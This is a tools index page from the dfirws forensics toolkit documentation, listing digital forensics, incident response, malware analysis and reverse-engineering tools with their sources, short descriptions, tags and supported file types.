Skip to content

Categories

Categories generated from dfirws shortcuts.

Categories Index

Tools Index

Tool Source Description Tags File Extensions Profiles
4n4lDetector GitHub Release Advanced static analysis tool malware-analysis, pe-analysis, detection .exe, .dll Full only
7-Zip Installer 7-Zip is a file archive tool.
@marp-team/marp-cli npm A CLI interface for Marp and Marpit based converters. Markdown presentations. markdown, office, documentation .md, .markdown
acquire Python forensics, incident-response, acquisition, disk-forensics .tar
adalanche GitHub Release Attack Graph Visualizer and Explorer (Active Directory) ...Who's really Domain Admin? windows, network-analysis, threat-intelligence, visualization Full only
admonitions GitHub Release Obsidian admonitions plugin. markdown, plugins Full only
ai-fs-proxy Git IP over filesystem. ai, filesystem
aiodns Python network, dns
aiohttp Python network, http
aLEAPP GitHub Release ALEAPP is a tool for parsing and analyzing Android logs, events, and protobuf files. It can be used to extract artifacts from Android devices and analyze them in a structured way. mobile-forensics, android, artifact-extraction .tar, .zip
Amazon Corretto 21 Installer Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). java .java
Android SDK Platform Tools HTTP Android SDK Platform Tools include ADB and Fastboot for Android device management. android, mobile-forensics, debugging Full only
API Monitor HTTP API Monitor is a tool for monitoring Windows API calls. reverse-engineering, api-tracing, dynamic-analysis .exe, .dll
apktool HTTP apktool is a tool for reverse engineering Android APK files. reverse-engineering, android, decompiler .apk
APT-Hunter Git APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity. event-log, threat-hunting .evtx
Ares GitHub Release Automated decoding of encrypted text without knowing the key or ciphers used malware-analysis, pe-analysis .exe, .dll
artemis GitHub Release Artemis is a tool for extracting and analyzing Windows artifacts. It can be used for triage and forensic analysis of Windows systems, allowing investigators to quickly gather information about the system and its activity. forensics, artifact-extraction, triage .exe, .dll, .evtx, .reg
ASL Git Detect packer, compiler, protector, .NET obfuscator, PUA application pe-analysis, packer-detection .exe
Aspose.Email-for-Python-via-Net Python email, forensics, data-extraction .msg, .eml, .pst, .ost, .mbox
Audacity GitHub Release Audacity is a free and open-source audio editing software. audio, steganography .wav, .mp3, .flac, .ogg, .aiff Full only
autoit-ripper Python Extract AutoIt scripts embedded in PE binaries. malware-analysis, scripting, deobfuscation .exe
Autopsy Winget Autopsy is a digital forensics platform that allows users to analyze disk images and extract artifacts from them. It provides a graphical user interface for examining file systems, recovering deleted files, and analyzing network traffic. disk-forensics, forensics, gui, artifact-extraction .dd, .raw, .E01, .img, .vmdk Full only
autopsy_addon_modules Git Collection of third-party add-on modules for Autopsy — ingest modules, content viewers, report modules, and data source processors. forensics, disk-forensics, plugins, documentation
Azure CLI HTTP Azure CLI is a command-line tool for managing Azure resources. Full only
BeaconHunter GitHub Release Detect and respond to Cobalt Strike beacons using ETW. malware-analysis, cobalt-strike, memory-forensics .dmp, .exe, .dll
BeautifulSoup4 Python web, parsing, data-extraction .html, .htm, .xml
Binary Ninja HTTP Binary Ninja is a reverse engineering platform. reverse-engineering, disassembler, decompiler .exe, .dll, .elf, .bin, .so, .dylib Full only
binary-refinery Python The Binary Refinery is a collection of Python scripts that implement transformations of binary data such as compression and encryption. We will often refer to it simply by refinery, which is also the name of the corresponding package. malware-analysis, deobfuscation, data-extraction, scripting .exe, .dll, .bin
binlex GitHub Release binlex is a binary genetic traits lexer for malware analysis. malware-analysis, binary-analysis, binary-diffing .exe, .dll, .elf, .bin
bitstruct Python binary-analysis, data-processing
BlueTuxedo Git A tiny tool built to find and fix common misconfigurations in Active Directory-integrated DNS windows, network-analysis, dns
bmc-tools Git RDP Bitmap Cache parser forensics, network, windows
box-js npm A tool for studying JavaScript malware. malware-analysis, javascript, dynamic-analysis, deobfuscation .js
bulk_extractor HTTP bulk_extractor extracts features such as email addresses and URLs from disk images. forensics, carving, data-extraction .dd, .raw, .E01, .img
Burp Suite Winget Burp Suite is an integrated platform for performing security testing of web applications. It provides a wide range of tools for intercepting HTTP traffic, analyzing web applications, and automating security testing tasks. web, security-testing, network Full only
bytecode-viewer GitHub Release A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More) reverse-engineering, java, decompiler, deobfuscation .class, .jar, .apk, .dex
cabarchive Python compression, data-extraction .cab
capa GitHub Release capa rules for identifying capabilities in binaries. malware-analysis, pe-analysis, reverse-engineering, mitre-attack .exe
capa Explorer Web HTTP capa Explorer Web is a web UI for exploring capa results. malware-analysis, visualization .exe, .dll Full only
capa-rules GitHub Release Rules for capa.
CapaExplorer Git Capa analysis importer for Ghidra. reverse-engineering, malware-analysis, visualization, plugins
cart Python Compressed and RC4 Transport (CaRT) Neutering format. This is a file format that is used to neuter malware files for distribution in the malware analyst community. malware-analysis .cart
chainsaw GitHub Release Rapidly Search and Hunt through Windows Forensic Artefacts log-analysis, incident-response, sigma, detection .evtx
chainsaw-rules Git A set of custom Chainsaw rules for event log threat hunting. sigma, detection-rules
chepy Python Chepy is a python library with a handy cli that is aimed to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible to the various functionalities that CyberChef offers, all in a pure Pythonic manner. data-processing, encoding, decoding, deobfuscation, hashing .bin, .txt, .hex
Chrome Winget Chrome is a widely used web browser developed by Google. It offers fast browsing, a user-friendly interface, and a wide range of extensions and developer tools, making it popular for both general web browsing and web development. browser, web .html, .htm, .js, .css Full only
CimSweep Git CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. windows, forensics
ClamAV Installer ClamAV is an open-source antivirus engine for detecting malware. Full only
cmder GitHub Release Cmder is a console emulator for Windows. terminal, shell Full only
CobaltStrikeScan GitHub Release Scan files or process memory for CobaltStrike beacons and parse their configuration malware-analysis, cobalt-strike, detection .exe, .dll, .dmp, .bin
ComparePlus GitHub Release A diff plugin for Notepad++. text-editor, binary-diffing, plugins
compressed_rtf Python office, rtf, data-extraction .rtf
csvkit Python A suite of command-line tools for working with CSV, the king of tabular file formats. csv, data-processing, cli .csv
CuTE-tui Cargo CuTE-tui is a terminal user interface (TUI) tool for making HTTP requests and analyzing responses. It provides a user-friendly interface for crafting and sending HTTP requests, as well as viewing and analyzing the responses. This tool can be useful for testing APIs, debugging web applications, and performing various HTTP-related tasks from the command line. tui, http, network
Cutter GitHub Release Cutter is a Qt and C++ GUI powered by Rizin that provides an intuitive interface for reverse engineering and analyzing binaries across multiple platforms. reverse-engineering, disassembler, decompiler, gui .exe, .dll, .elf, .bin, .so, .dylib Full only
cutter-jupyter Git Jupyter Plugin for Cutter. reverse-engineering
cutterref Git Cutter Instruction Reference Plugin reverse-engineering, documentation, plugins
CVE Data Enrichment CVE list data from the CVEProject cvelistV5 repository. vulnerability, threat-intelligence .json, .zip
CyberChef GitHub Release CyberChef is a web app for data processing and analysis. It provides a wide range of operations for encoding, decoding, encrypting, decrypting, and analyzing data. data-processing, encoding, decoding, deobfuscation, encryption, hashing .bin, .txt, .json, .hex
DB Browser for SQLite GitHub Release DB Browser for SQLite is a high quality, visual, open source tool for creating, designing, and editing database files compatible with SQLite. database, sqlite, gui .db, .sqlite, .sqlite3
DBeaver GitHub Release DBeaver is a database management tool. database, gui .db, .sqlite, .sqlite3, .sql Full only
DCode HTTP DCode is a date/time conversion and analysis tool. metadata, forensics, decoding
debloat GitHub Release A GUI and CLI tool for removing bloat from executables malware-analysis, pe-analysis, deobfuscation .exe, .dll
decai Git r2js plugin for radare2 with special focus on AI-assisted decompilation. Installed by copying decai.r2.js to the radare2 plugins directory. reverse-engineering, ai, decompiler .exe, .dll, .elf, .bin, .so
deep_translator Python A flexible free and unlimited python tool to translate between different languages in a simple way using multiple translators data-processing
defender-detectionhistory-parser Git A parser of Windows Defender's DetectionHistory forensic artifact, containing substantial info about quarantined files and executables. windows, malware-detection, forensics
DensityScout HTTP DensityScout calculates file entropy and density. malware-analysis, entropy-analysis .exe, .dll, .bin
deobfuscator npm javascript-obfuscator cleaner & deobfuscator javascript, deobfuscation, malware-analysis .js
deobshell Git Powershell script deobfuscation using AST in Python. powershell, deobfuscation, malware-analysis
Dependencies GitHub Release Dependencies is a tool to view dependencies of Windows binaries. dependencies, binary-analysis, windows .exe, .dll
Detect It Easy GitHub Release Detect It Easy is a tool for identifying file types and detecting packers. pe-analysis, file-analysis, packer-detection .exe, .dll, .elf, .mach-o, .bin
dfir-toolkit Cargo The dfir-toolkit is a collection of command-line tools for digital forensics and incident response (DFIR) tasks. It includes various utilities for analyzing log files, registry hives, MFT files, and other artifacts commonly encountered in DFIR investigations. forensics, timeline, log-analysis, event-log, registry, bodyfile .evtx, .reg, .dat, .lnk, .pf, .mft, .zip
dfir-unfurl Python osint, network, forensics, visualization
dfir_ntfs Python An NTFS/FAT parser for digital forensics & incident response. ntfs, filesystem, forensics, disk-forensics .mft, .dd, .raw, .img
DFIRArtifactMuseum Git The goal of this repo is to archive artifacts from all versions of various OS's and categorizing them by type. This will help with artifact validation processes as well as increase access to artifacts that may no longer be readily available anymore. forensics, artifact-extraction, documentation
dfirws-sample-files Git Sample files to test forensics tools. forensics
dictionaries Git Dictionaries and related code and data for Libreoffice. password-cracking, office
dissect Python forensics, incident-response, data-extraction .dd, .raw, .tar
dissect.target Python forensics, incident-response, artifact-extraction .dd, .raw, .tar, .vmdk, .E01
DitExplorer GitHub Release Tool for viewing NTDS.dit Active Directory database files. windows, network-analysis, forensics .dit
dll_to_exe GitHub Release Converts a DLL into EXE pe-analysis, conversion .dll, .exe
dnslib Python network, dns
dnSpy GitHub Release dnSpy is a .NET debugger and decompiler. It can be used to analyze and debug .NET applications, including malware. dotnet, debugging, reverse-engineering
docsify-cli npm A magical documentation generator. documentation, markdown .md, .html
docx2txt Python A pure python-based utility to extract text and images from docx files. office, data-extraction .docx
Dokany GitHub Release User mode file system library for windows with FUSE Wrapper filesystem, disk-forensics Full only
DotNet 6 Desktop Runtime Installer The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 6.0. dotnet
DotNet 8 Desktop Runtime Winget The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 8.0. dotnet
DotNet 9 Desktop Runtime Winget The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 9.0. dotnet
dotnetfile Git dotnetfile is a Common Language Runtime (CLR) header parser library for Windows .NET files built in Python. The CLR header is present in every Windows .NET assembly beside the Portable Executable (PE) header. It stores a plethora of metadata information for the managed part of the file. pe-analysis, dotnet
dotnetfile Python pe-analysis, dotnet .exe, .dll
dpkt Python network-analysis, pcap, protocol-analysis .pcap, .pcapng
DSpellCheck GitHub Release A spell-checker plugin for Notepad++. text-editor, plugins
dsq GitHub Release Commandline tool for running SQL queries against JSON, CSV, Excel, Parquet, and more. data-processing, database, json, csv .json, .csv, .tsv, .parquet
Dumpbin GitHub Release Microsoft COFF Binary File Dumper: Extract from Visual Studio MSVC Tools pe-analysis, reverse-engineering .exe, .dll, .obj, .lib
edit GitHub Release Edit is a simple text editor for Windows made by Microsoft. text-editor
Elastic Stack (ELK + Beats) HTTP Downloads Elasticsearch, Kibana, Logstash, Elastic Agent, and Beats. siem, log-analysis, search, visualization .json, .log Full only
elasticsearch Python database, log-analysis, search, siem
Elfparser-ng GitHub Release Multiplatform CLI and GUI tool to show information about ELF files. reverse-engineering, elf-analysis, linux .elf, .so
EmailAnalyzer Git With EmailAnalyzer you can analyze your suspicious emails. You can extract headers, links, and hashes from the .eml file and you can generate reports. email, forensics, phishing .eml
ese-analyst Git This is a set of tools for doing forensics analysis on Microsoft ESE databases. forensics, windows, database, csv .dat
evtx Python log-analysis, event-log, windows .evtx
EVTX-ATTACK-SAMPLES Git Windows Events Attack Samples. event-log, mitre-attack .evtx
evtx_dump GitHub Release A Fast (and safe) parser for the Windows XML Event Log (EVTX) format log-analysis, event-log, windows .evtx
ExifTool HTTP ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. metadata, file-analysis .jpg, .jpeg, .png, .gif, .tiff, .pdf, .doc, .docx, .mp4
extract-msg Python Extracts emails and attachments saved in Microsoft Outlook's .msg files email, data-extraction .msg
FASM HTTP FASM is a fast assembler for x86 and x86-64 architectures. reverse-engineering .asm
ffmpeg GitHub Release ffmpeg is a free and open-source multimedia framework for processing video and audio files. It can be used to convert between different formats, extract audio from video files, and perform various other multimedia processing tasks. audio, conversion .mp4, .avi, .mkv, .mov, .mp3, .wav, .flac Full only
Fibratus GitHub Release Adversary tradecraft detection, protection, and hunting windows, monitoring .etl Full only
Firefox Winget Firefox is a fast and secure web browser that can be used to browse the internet, view websites, and manage bookmarks and passwords. browser, web .html, .htm, .js, .css Full only
Flare-Fakenet-NG GitHub Release FakeNet-NG - Next Generation Dynamic Network Analysis Tool malware-analysis, network, dynamic-analysis .pcap
Flare-Floss GitHub Release Flare-Floss is a tool for extracting strings from malware samples. malware-analysis, string-extraction, deobfuscation .exe, .dll, .bin
flatten_json Python Flatten JSON objects python, json .json
flow.record Python forensics, data-processing .rec
forensic-timeliner GitHub Release A high-speed forensic timeline engine for Windows forensic artifact CSV output built for DFIR investigators. Quickly consolidate CSV output from processed triage evidence for Eric Zimmerman (EZ Tools) Kape, Axiom, Hayabusa, Chainsaw and Nirsoft into a unified timeline. forensics, timeline .evtx, .csv, .json Full only
Foxit PDF Reader Winget Foxit PDF Reader is a lightweight and fast PDF viewer that can be used to open and view PDF files. It is an alternative to Adobe Acrobat Reader and offers features such as annotation, form filling, and digital signatures. pdf, viewer .pdf Full only
fq GitHub Release jq for binary formats - tool, language and decoders for working with binary and text formats data-processing, binary-analysis, file-analysis .pcap, .pcapng, .mp4, .mp3, .flac, .zip, .tar, .gif, .png
fqlite GitHub Release FQLite - SQLite Forensic Toolkit. FQLite is a tool to find and restore deleted records in SQlite databases. It therefore examines the database for entries marked as deleted. database, sqlite, forensics .db, .sqlite, .sqlite3 Full only
frida-tools Python Frida CLI tools. reverse-engineering, dynamic-analysis .exe, .apk, .ipa
FullEventLogView HTTP FullEventLogView is a tool for viewing Windows event logs. log-analysis, event-log, windows .evtx
fx GitHub Release fx is a terminal JSON viewer and processor. json, data-processing, visualization .json, .jsonl
geoip2 Python geolocation, network, maxmind .mmdb
Geolocus Enrichment Geolocus MMDB geolocation database. geolocation, mmdb .mmdb
geolocus-cli HTTP geolocus-cli is a geolocation lookup tool. geolocation, osint .json
gftrace GitHub Release A command line Windows API tracing tool for Golang binaries. reverse-engineering, api-tracing, golang .exe
Ghidra Installer Ghidra is a software reverse engineering (SRE) framework developed by NSA's Research Directorate. Full only
Ghidra BTIGhidra GitHub Release Binary Type Inference Ghidra Plugin reverse-engineering, disassembler, decompiler .exe, .dll, .elf, .bin, .so
Ghidra Cartographer GitHub Release Code Coverage Exploration Plugin for Ghidra. reverse-engineering, disassembler, visualization .exe, .dll, .elf, .bin, .so
Ghidra GhidrAssistMCP GitHub Release Ghidra extension implementing MCP server for AI-assisted reverse engineering. Enable in Ghidra via File > Configure > Configure Plugins. Server runs on localhost:8080 by default. reverse-engineering, mcp, ai, plugins .exe, .dll, .elf, .bin, .so
Ghidra GolangAnalyzerExtension GitHub Release GoLang extension for Ghidra. reverse-engineering, golang .exe, .elf
ghidrecomp Python Python Command-Line Ghidra Decomplier. reverse-engineering, decompiler .exe, .dll, .elf
ghidriff Python Ghidra Binary Diffing Engine. reverse-engineering, binary-diffing .exe, .dll, .elf
git Installer A fork of Git containing Windows-specific patches.
go-size-analyzer GitHub Release go-size-analyzer (gsa) is a tool to analyze the size of Go binaries. golang, binary-analysis .exe, .dll
god-mode-rules Git God Mode Detection Rules yara, sigma, detection-rules
godap GitHub Release godap is a tool for analyzing Active Directory LDAP data. windows, network-analysis, network Full only
GoLang Installer Go programming language.
Google Earth Pro Winget Google Earth Pro is a tool for viewing satellite imagery, maps, and geographic information. It can be used for geolocation analysis, visualizing data, and exploring geographic features. geolocation, osint, visualization .kml, .kmz Full only
gootloader Git Collection of scripts used to deobfuscate GOOTLOADER malware samples. malware-analysis
GoReSym Git Go symbol recovery tool reverse-engineering, golang
GoReSym GitHub Release Go symbol recovery tool. reverse-engineering, golang .exe, .elf
gostringungarbler Git Python tool to resolve all strings in Go binaries obfuscated by garble. reverse-engineering, golang, deobfuscation
Gpg4win HTTP Gpg4win provides GnuPG and related tools for Windows. encryption .gpg, .asc, .pgp
Graphviz HTTP Graphviz is a graph visualization software suite. visualization, graph .dot, .gv
graphviz Python visualization, graph .dot, .gv
grip Python Render local readme files before sending off to GitHub. markdown, viewer .md
gron GitHub Release gron makes JSON greppable by transforming it into discrete assignments that can be easily searched and filtered using standard command-line tools. json, data-processing, search .json
gti-dev-kit Git The Google Threat Intelligence dev kit is a collection of example code to quickly develop functional integrations with the GTI API, enabling a unified view of the threat landscape and reducing manual effort in threat analysis. malware-detection, threat-intelligence
h2database GitHub Release H2 Database is an open source Java SQL database. database, java .h2.db Full only
hachoir Python Hachoir is a Python library to view and edit a binary stream field by field. In other words, Hachoir allows you to "browse" any binary stream just like you browse directories and files. binary-analysis, metadata, file-analysis .exe, .dll, .png, .jpg, .zip, .tar, .gz
hashcat HTTP hashcat is a password recovery tool. password-cracking, hashing Full only
hayabusa GitHub Release Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs. log-analysis, event-log, sigma, detection, timeline, incident-response .evtx
hayabusa-rules Git Curated Windows event log Sigma rules used in Hayabusa and Velociraptor. event-log, detection-rules, sigma .evtx
hexdump Python hex-editor, binary-analysis .bin
hfs GitHub Release hfs is a simple HTTP file server for Windows. http, network
HiddenWave Git Hide Your Secret Message in any Wave Audio File. steganography, audio, ctf .waw
HindSight GitHub Release Browser forensics tool for Google Chrome (and other Chromium-based browsers). browser-forensics, browser, artifact-extraction .db, .sqlite
HollowsHunter GitHub Release Scans running processes. Recognizes and dumps a variety of in-memory implants malware-analysis, pe-analysis, dynamic-analysis .exe, .dll, .dmp
HxD HTTP HxD is a hex editor, disk editor, and memory editor for Windows. hex-editor, binary-analysis .exe, .dll, .bin, .hex
Iaito GitHub Release iaito is the official graphical interface for radare2, a libre reverse engineering framework. reverse-engineering, disassembler, gui .exe, .dll, .elf, .bin, .so
IDR Git Interactive Delphi Reconstructor reverse-engineering, decompiler
iLEAPP GitHub Release iLEAPP is a tool for parsing and analyzing iOS logs, events, and plists. It can be used to extract artifacts from iOS devices and analyze them in a structured way. mobile-forensics, artifact-extraction .tar, .zip
ILSpy GitHub Release ILSpy is a .NET assembly browser and decompiler. dotnet, decompiler, reverse-engineering .exe, .dll
ImHex GitHub Release ImHex is a hex editor for binary analysis and pattern language. hex-editor, binary-analysis, reverse-engineering .exe, .dll, .bin, .hex, .elf
Incident-Response-Powershell Git PowerShell Digital Forensics & Incident Response Scripts. incident-response, powershell
INDXRipper GitHub Release Carve file metadata from NTFS index ($I30) attributes ntfs, filesystem, forensics, metadata .bin
IPinfo Country ASN Enrichment IPinfo.io free IP to Country and ASN database in MMDB format. Requires IPINFO_API_KEY. geolocation, network .mmdb
IrfanView Winget IrfanView is a fast and compact image viewer and editor for Windows. It supports a wide range of image formats and provides basic editing features, making it useful for quickly viewing and manipulating images. viewer .jpg, .jpeg, .png, .gif, .bmp, .tiff, .ico, .webp
iShutdown Git iShutdown scripts: extracts, analyzes, and parses Shutdown.log forensic artifact from iOS Sysdiagnose archives mobile-forensics, forensics
jadx GitHub Release Dex to Java decompiler reverse-engineering, android, decompiler, java, deobfuscation .apk, .dex, .jar, .class, .zip Full only
JavaFX SDK HTTP JavaFX SDK provides UI libraries for Java applications. java, gui .jar
javaobj-py3 Python
jd-gui GitHub Release A standalone Java Decompiler GUI reverse-engineering, java, decompiler .class, .jar
jpterm Python Jupyter in the terminal. python, data-processing, tui .json
jq GitHub Release jq is a powerful command-line JSON processor that allows you to parse, filter, and manipulate JSON data with ease. It supports a wide range of operations, including selecting specific fields, transforming data, and performing complex queries. With its simple syntax and extensive functionality, jq is an essential tool for anyone working with JSON data in the command line. json, data-processing, cli .json, .ndjson, .jsonl
jsbeautifier Python JavaScript unobfuscator and beautifier. javascript, deobfuscation .js
jsdom npm jsdom is a pure-JavaScript implementation of many web standards, notably the WHATWG DOM and HTML Standards, for use with Node.js. In general, the goal of the project is to emulate enough of a subset of a web browser to be useful for testing and scraping real-world web applications. javascript, parsing .html, .htm, .js
Jumplist Browser GitHub Release Automatic/Custom Destinations & LNK (MS-SHLLINK) Browser windows, forensics, artifact-extraction .automaticDestinations-ms, .customDestinations-ms, .lnk
jupyter-collection Git Collection of Jupyter Notebooks by @fr0gger_ python
jupyterlab Python JupyterLab computational environment python, data-processing .ipynb
jwt-cli GitHub Release A super fast CLI tool to decode and encode JWTs built in Rust web, security-testing, decoding
keystone-engine Python reverse-engineering
LeechCore.wiki Git GitHub wiki for LeechCore. memory-forensics, documentation
legacy-sigmatools Git Legacy Sigma Tools (sigmac etc.) sigma, detection-rules
lessmsi GitHub Release lessmsi is a tool to view and extract the contents of a Windows Installer (.msi) file. windows .msi
libimobiledevice-windows Git A Windows port of libimobiledevice, a cross-platform library to communicate with iOS devices. It includes tools for extracting data from iOS devices, such as lockdown, idevicebackup2, and more. mobile-forensics, forensics
LibreOffice HTTP LibreOffice is a free and open-source office suite. office, viewer .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp Full only
lief Python pe-analysis, elf-analysis, binary-analysis .exe, .dll, .elf, .mach-o
litecli Python CLI for SQLite Databases with auto-completion and syntax highlighting. database, sqlite, cli .db, .sqlite
LnkParse3 Python Windows Shortcut file (LNK) parser windows, forensics, file-analysis .lnk
LogBoost GitHub Release Convert a variety of log formats to CSV while enriching detected IPs with Geolocation, ASN, DNS, WhoIs, Shodan InternetDB and Threat Indicator matches. log-analysis, event-log .evtx, .csv, .json Full only
Loki GitHub Release Loki - Simple IOC and YARA Scanner malware-analysis, ioc-scanner, yara, detection .exe, .dll, .bin
LUMEN npm Your Browser-based EVTX Companion. log-analysis, event-log, forensics, visualization .evtx
maclookup Python network
magika Python A tool to determine the content type of a file with deep learning. file-analysis, ai
Mail Viewer HTTP Mail Viewer is a tool for viewing email files and mailboxes. email, forensics .eml, .msg
Malcat Lite HTTP Malcat is a malware analysis and reverse engineering tool. pe-analysis, malware-analysis, hex-editor, disassembler .exe, .dll, .elf, .bin, .sys
maldump Python Maldump makes it easy to extract quarantined files of multiple AVs from a live system or a mounted disk image. malware-analysis, malware-detection
malware-bazaar-advanced-search Git Script to chain search parameters for MalwareBazaar malware-analysis, threat-intelligence
malwarebazaar Python CLI wrapper for malware bazaar API (bazaar.abuse.ch) and YARAify API (yaraify.abuse.ch) malware-analysis, threat-intelligence, ioc-scanner
markitdown Python Utility tool for converting various files to Markdown. conversion, markdown, data-extraction, office .docx, .xlsx, .pptx, .pdf, .html
MasterParser Git MasterParser is a powerful DFIR tool designed for analyzing and parsing Linux logs log-analysis, linux, security-testing .log
matplotlib Python visualization
MaxMind GeoLite2 ASN Enrichment MaxMind GeoLite2 ASN database for mapping IP addresses to Autonomous System Numbers. Requires MAXMIND_LICENSE_KEY. geolocation, network, maxmind .mmdb, .tar.gz
MaxMind GeoLite2 City Enrichment MaxMind GeoLite2 City database for mapping IP addresses to city-level geolocation. Requires MAXMIND_LICENSE_KEY. geolocation, maxmind .mmdb, .tar.gz
MaxMind GeoLite2 Country Enrichment MaxMind GeoLite2 Country database for mapping IP addresses to countries. Requires MAXMIND_LICENSE_KEY. geolocation, maxmind .mmdb, .tar.gz
mboxviewer GitHub Release A small but powerful app for viewing MBOX files. email, forensics .mbox, .eml
mcp-server-elasticsearch GitHub Release MCP server to connect to elastic 8.X mcp, ai, log-analysis ``
MemProcFS GitHub Release MemProcFS is an easy and convenient way of viewing physical memory as files in a virtual file system. memory-forensics, filesystem .dmp, .raw, .vmem, .img
MemProcFS.wiki Git GitHub wiki for MemProcFS memory-forensics, documentation
MetadataPlus GitHub Release A tool to use novel locations to extract metadata from Office documents. metadata, file-analysis .exe, .dll, .doc, .docx, .xls, .xlsx, .pdf, .jpg, .png
MEX HTTP MEX is an extension for WinDbg. debugging, dotnet .dmp
MFTBrowser GitHub Release $MFT directory tree reconstruction & FILE record info ntfs, filesystem, forensics .mft
Microsoft OpenJDK 11 HTTP Microsofts OpenJDK 11 java
Microsoft.etl2pcapng Winget Microsoft.etl2pcapng is a tool for converting ETL (Event Trace Log) files to PCAPNG format, allowing you to analyze network traffic captured in ETL files using tools like Wireshark. network-analysis, pcap, protocol-analysis .etl
minidump Python Python library to parse Windows minidump file format. memory-forensics, windows .dmp
MiTeC Structured Storage Viewer HTTP Full-featured MS OLE Structured Storage based file management tool. office, ole, data-extraction .doc, .xls, .ppt, .msg
mkyara Python yara, detection-rules, malware-analysis .exe, .dll, .bin
mmdbinspect GitHub Release Tool for inspecting MaxMind GeoIP2 databases. geolocation, maxmind .mmdb
MsgViewer GitHub Release A tool for viewing and analyzing Outlook MSG files. email, forensics .msg
msidump Python MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. ioc, data-extraction, enrichment, parsing, forensics .msi
msoffcrypto-tool Python Python tool and library for decrypting and encrypting MS Office files using a password or other keys office, encryption, decryption .doc, .docx, .xls, .xlsx, .ppt, .pptx
MSRC Git Data from Microsoft patch tuesdays. vulnerability, windows
msticpy Python threat-intelligence, incident-response, python .json, .csv
mwcp Python A framework for malware configuration parsers. malware-analysis, data-extraction .exe, .dll, .bin
name-that-hash Python The Modern Hash Identification System. hashing, file-analysis
Neo4j HTTP Neo4j is a graph database. database, graph, visualization Full only
neo4j Python database, graph
Neovim Winget Neovim is a terminal-based text editor that can be used for editing scripts, notes, and other text files. It is a fork of Vim with additional features and improvements. text-editor, code-editor, terminal .txt, .md, .log, .ps1, .py, .rb, .js
Nerd Fonts GitHub Release Nerd Fonts for terminal and more. terminal .ttf, .otf
netaddr Python A network address manipulation library for Python. network
NetExt GitHub Release WinDbg extension for data mining managed heap. It also includes commands to list http request, wcf services, WIF tokens among others debugging, memory-forensics, dotnet, plugins .dmp
NetworkMiner HTTP NetworkMiner is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files. network-analysis .pcap, .pcapng, .etl Full only
networkx Python visualization, graph
NirSoft Browser Utilities HTTP NirSoft browser utilities for cache and history analysis. browser-forensics, artifact-extraction .db, .sqlite
Nmap HTTP Nmap is a network exploration and security auditing tool. network-analysis, security-testing, osint
NodeJS Installer Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. javascript, nodejs .js
Notepad++ GitHub Release Notepad++ is a free source code editor and Notepad replacement that supports several programming languages. text-editor .txt, .log, .xml, .json, .csv, .ps1, .py, .js
Npcap HTTP Npcap packet capture driver installer. network-analysis, pcap .pcap, .pcapng
numpy Python Fundamental package for array computing in Python. data-processing
Obsidian Winget Obsidian is a powerful knowledge management and note-taking application that allows you to create and link notes in a graph-based structure. markdown .md, .markdown Full only
obsidian-calendar-plugin GitHub Release Obsidian calendar plugin. markdown, plugins Full only
obsidian-dataview GitHub Release Obsidian dataview plugin. markdown, data-processing, plugins Full only
obsidian-excalidraw-plugin GitHub Release Obsidian Excalidraw plugin. markdown, plugins Full only
obsidian-kanban GitHub Release Obsidian Kanban plugin. markdown, plugins Full only
obsidian-mitre-attack GitHub Release A vault for Obsidian.md containing the MITRE ATT&CK framework in markdown format. markdown, mitre-attack, threat-intelligence Full only
obsidian-tasks GitHub Release Obsidian tasks plugin. markdown, plugins Full only
obsidian-timeline GitHub Release Obsidian timeline plugin. markdown, timeline, plugins Full only
OfficeMalScanner Git OfficeMalScanner can scan old office documents. office, vba, malware-analysis .doc, .ppt, .xls
oh-my-posh Winget Oh My Posh is a customizable prompt for PowerShell and other shells. It allows you to create beautiful and functional command-line prompts with themes and customizations. terminal, shell
olefile Python office, ole, data-extraction .doc, .xls, .ppt, .msg
oletools Python Python tools to analyze security characteristics of MS Office and OLE files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), for Malware Analysis and Incident Response #DFIR. office, malware-analysis, vba .doc, .docx, .xls, .xlsx, .ppt, .pptx, .rtf
one-extract Git Python library for extracting objects from OneNote files. forensics, office, data-extraction
opencode-ai npm AI coding agent for the terminal with MCP server support. Configured with MCP servers for Ghidra (GhidrAssistMCP), radare2 (r2mcp), and regipy. ai, automation, mcp .txt, .md, .log, .json
openpyxl Python office, data-extraction .xlsx
OpenVPN Winget OpenVPN is a widely used open-source VPN solution that allows you to create secure connections over the internet. It is designed to be flexible and secure, supporting various authentication methods and encryption protocols. network .ovpn Full only
orjson Python json, data-processing .json
OSFMount Winget OSFMount is a tool for mounting disk images and virtual hard disks as virtual drives. It can be used for analyzing disk images, accessing files within them, and performing forensic analysis on the mounted images. disk-forensics, filesystem .dd, .raw, .E01, .img, .vmdk, .iso
PacketCircle Git Wireshark Plugin for traffic-matrix visualization. network, plugins, visualization .pcap, .pcapng
paramiko Python network, scripting
PatchaPalooza Git A comprehensive tool that provides an insightful analysis of Microsoft's monthly security updates. vulnerability, windows, binary-diffing
pathlab Python forensics, filesystem
pcode2code Python A vba p-code decompiler based on pcodedmp office, vba, decompiler .doc, .xls, .ppt
pdfalyzer Python Analyze PDFs with colors (and YARA). Visualize a PDF's inner tree-like data structure, check it against a library of YARA rules, force decodes of suspicious font binaries, and more. pdf, malware-analysis, visualization .pdf
PDFStreamDumper HTTP PDFStreamDumper is a tool for inspecting PDF files. pdf, malware-analysis, javascript .pdf
PE-bear GitHub Release A tool for analyzing PE files pe-analysis, reverse-engineering .exe, .dll, .sys
